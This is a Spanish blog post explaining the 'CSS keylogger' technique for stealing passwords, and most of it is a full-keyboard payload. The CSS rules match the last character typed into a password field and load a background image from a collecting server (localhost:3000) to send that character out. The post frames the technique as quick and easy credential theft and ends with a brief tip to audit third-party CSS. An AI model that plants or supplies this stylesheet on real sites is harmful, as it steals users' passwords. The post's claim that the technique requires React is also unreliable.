Robando credenciales con CSS
CSS keylogger
En esta entrada vamos a explicar como a través de pocos pasos y rápidamente podemos robar sesiones a través de una técnica llamada CSS Keylogger.
Últimamente se está hablando mucho que el cargar código CSS remoto viene siendo un problema ya que se está abriendo una brecha de seguridad y se están reventando muchas contraseñas.
Lo malo de todo esto es que hacerlo funcionar es relativamente fácil y vamos a explicar como en los siguientes pasos.
Cómo funciona el CSS Keylogger
Como todos sabemos el CSS se encarga de dar estilos a una web o aplicación web.
Para que el CSS Keylogger funcione primero el sitio web tiene que estar trabajando con el framework en javascript React o que al menos la parte que queramos explotar esté basada en ese sistema. Esto tiene que ser así porque el navegador no es capaz de almacenar el valor "input" por lo tanto tan sólo con tener este sencillo código conseguiremos estar enviando estos credenciales a un servidor ajeno al nuestro.
Para conseguir eso tan sólo hay que poner este fragmento de código en el archivo.
Tan sólo con esto ya habremos pillado la letra "r", pero si inyectamos todos los caracteres del tecladoinput[type="password"][value$="r"] {background-image: url("http://localhost:3000/r");}
input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); }input[type="password"][value$="!"] { background-image: url("http://localhost:3000/%21"); }input[type="password"][value$="\""] { background-image: url("http://localhost:3000/%22"); }input[type="password"][value$="#"] { background-image: url("http://localhost:3000/%23"); }input[type="password"][value$="$"] { background-image: url("http://localhost:3000/%24"); }input[type="password"][value$="%"] { background-image: url("http://localhost:3000/%25"); }input[type="password"][value$="&"] { background-image: url("http://localhost:3000/%26"); }input[type="password"][value$="'"] { background-image: url("http://localhost:3000/%27"); }input[type="password"][value$="("] { background-image: url("http://localhost:3000/%28"); }input[type="password"][value$=")"] { background-image: url("http://localhost:3000/%29"); }input[type="password"][value$="*"] { background-image: url("http://localhost:3000/%2A"); }input[type="password"][value$="+"] { background-image: url("http://localhost:3000/%2B"); }input[type="password"][value$=","] { background-image: url("http://localhost:3000/%2C"); }input[type="password"][value$="-"] { background-image: url("http://localhost:3000/-"); }input[type="password"][value$="."] { background-image: url("http://localhost:3000/."); }input[type="password"][value$="/"] { background-image: url("http://localhost:3000/%2F"); }input[type="password"][value$="0"] { background-image: url("http://localhost:3000/0"); }input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); }input[type="password"][value$="2"] { background-image: url("http://localhost:3000/2"); }input[type="password"][value$="3"] { background-image: url("http://localhost:3000/3"); }input[type="password"][value$="4"] { background-image: url("http://localhost:3000/4"); }input[type="password"][value$="5"] { background-image: url("http://localhost:3000/5"); }input[type="password"][value$="6"] { background-image: url("http://localhost:3000/6"); }input[type="password"][value$="7"] { background-image: url("http://localhost:3000/7"); }input[type="password"][value$="8"] { background-image: url("http://localhost:3000/8"); }input[type="password"][value$="9"] { background-image: url("http://localhost:3000/9"); }input[type="password"][value$=":"] { background-image: url("http://localhost:3000/%3A"); }input[type="password"][value$=";"] { background-image: url("http://localhost:3000/%3B"); }input[type="password"][value$="<"] { background-image: url("http://localhost:3000/%3C"); }input[type="password"][value$="="] { background-image: url("http://localhost:3000/%3D"); }input[type="password"][value$=">"] { background-image: url("http://localhost:3000/%3E"); }input[type="password"][value$="?"] { background-image: url("http://localhost:3000/%3F"); }input[type="password"][value$="@"] { background-image: url("http://localhost:3000/%40"); }input[type="password"][value$="A"] { background-image: url("http://localhost:3000/A"); }input[type="password"][value$="B"] { background-image: url("http://localhost:3000/B"); }input[type="password"][value$="C"] { background-image: url("http://localhost:3000/C"); }input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }input[type="password"][value$="E"] { background-image: url("http://localhost:3000/E"); }input[type="password"][value$="F"] { background-image: url("http://localhost:3000/F"); }input[type="password"][value$="G"] { background-image: url("http://localhost:3000/G"); }input[type="password"][value$="H"] { background-image: url("http://localhost:3000/H"); }input[type="password"][value$="I"] { background-image: url("http://localhost:3000/I"); }input[type="password"][value$="J"] { background-image: url("http://localhost:3000/J"); }input[type="password"][value$="K"] { background-image: url("http://localhost:3000/K"); }input[type="password"][value$="L"] { background-image: url("http://localhost:3000/L"); }input[type="password"][value$="M"] { background-image: url("http://localhost:3000/M"); }input[type="password"][value$="N"] { background-image: url("http://localhost:3000/N"); }input[type="password"][value$="O"] { background-image: url("http://localhost:3000/O"); }input[type="password"][value$="P"] { background-image: url("http://localhost:3000/P"); }input[type="password"][value$="Q"] { background-image: url("http://localhost:3000/Q"); }input[type="password"][value$="R"] { background-image: url("http://localhost:3000/R"); }input[type="password"][value$="S"] { background-image: url("http://localhost:3000/S"); }input[type="password"][value$="T"] { background-image: url("http://localhost:3000/T"); }input[type="password"][value$="U"] { background-image: url("http://localhost:3000/U"); }input[type="password"][value$="V"] { background-image: url("http://localhost:3000/V"); }input[type="password"][value$="W"] { background-image: url("http://localhost:3000/W"); }input[type="password"][value$="X"] { background-image: url("http://localhost:3000/X"); }input[type="password"][value$="Y"] { background-image: url("http://localhost:3000/Y"); }input[type="password"][value$="Z"] { background-image: url("http://localhost:3000/Z"); }input[type="password"][value$="["] { background-image: url("http://localhost:3000/%5B"); }input[type="password"][value$="\\"] { background-image: url("http://localhost:3000/%5C"); }input[type="password"][value$="]"] { background-image: url("http://localhost:3000/%5D"); }input[type="password"][value$="^"] { background-image: url("http://localhost:3000/%5E"); }input[type="password"][value$="_"] { background-image: url("http://localhost:3000/_"); }input[type="password"][value$="`"] { background-image: url("http://localhost:3000/%60"); }input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }input[type="password"][value$="b"] { background-image: url("http://localhost:3000/b"); }input[type="password"][value$="c"] { background-image: url("http://localhost:3000/c"); }input[type="password"][value$="d"] { background-image: url("http://localhost:3000/d"); }input[type="password"][value$="e"] { background-image: url("http://localhost:3000/e"); }input[type="password"][value$="f"] { background-image: url("http://localhost:3000/f"); }input[type="password"][value$="g"] { background-image: url("http://localhost:3000/g"); }input[type="password"][value$="h"] { background-image: url("http://localhost:3000/h"); }input[type="password"][value$="i"] { background-image: url("http://localhost:3000/i"); }input[type="password"][value$="j"] { background-image: url("http://localhost:3000/j"); }input[type="password"][value$="k"] { background-image: url("http://localhost:3000/k"); }input[type="password"][value$="l"] { background-image: url("http://localhost:3000/l"); }input[type="password"][value$="m"] { background-image: url("http://localhost:3000/m"); }input[type="password"][value$="n"] { background-image: url("http://localhost:3000/n"); }input[type="password"][value$="o"] { background-image: url("http://localhost:3000/o"); }input[type="password"][value$="p"] { background-image: url("http://localhost:3000/p"); }input[type="password"][value$="q"] { background-image: url("http://localhost:3000/q"); }input[type="password"][value$="r"] { background-image: url("http://localhost:3000/r"); }input[type="password"][value$="s"] { background-image: url("http://localhost:3000/s"); }input[type="password"][value$="t"] { background-image: url("http://localhost:3000/t"); }input[type="password"][value$="u"] { background-image: url("http://localhost:3000/u"); }input[type="password"][value$="v"] { background-image: url("http://localhost:3000/v"); }input[type="password"][value$="w"] { background-image: url("http://localhost:3000/w"); }input[type="password"][value$="x"] { background-image: url("http://localhost:3000/x"); }input[type="password"][value$="y"] { background-image: url("http://localhost:3000/y"); }input[type="password"][value$="z"] { background-image: url("http://localhost:3000/z"); }input[type="password"][value$="{"] { background-image: url("http://localhost:3000/%7B"); }input[type="password"][value$="|"] { background-image: url("http://localhost:3000/%7C"); }input[type="password"][value$="\\}"] { background-image: url("http://localhost:3000/%7D"); }input[type="password"][value$="~"] { background-image: url("http://localhost:3000/~"); }input[type="password"][value$=""] { background-image: url("http://localhost:3000/%7F"); }
Entonces tendremos todo un teclado virtual a la espera que alguien ponga sus credenciales para ser enviadas a un servidor ajeno al nuestro. Algo bastante peligroso, que ocupa muy poco tamaño y que se puede ocultar en prácticamente cualquier página web.
Por artimañas como las de este tipo es fundamental revisar todos los CSS que usamos para crear nuestras webs, siempre y cuando usemos plantillas, temas y demás.
Para más ejemplos podéis ver el GitHub del siguiente desarrollador donde nos explica también su funcionamiento más ampliado con un servidor de recepción.
Recordar que estamos abiertos a todo tipo de correcciones.
Para más info puedes consultarnos en nuestro email info@rekat.es o a través de nuestra página web https://rekat.es
Saludos! 👾
Comentarios
Publicar un comentario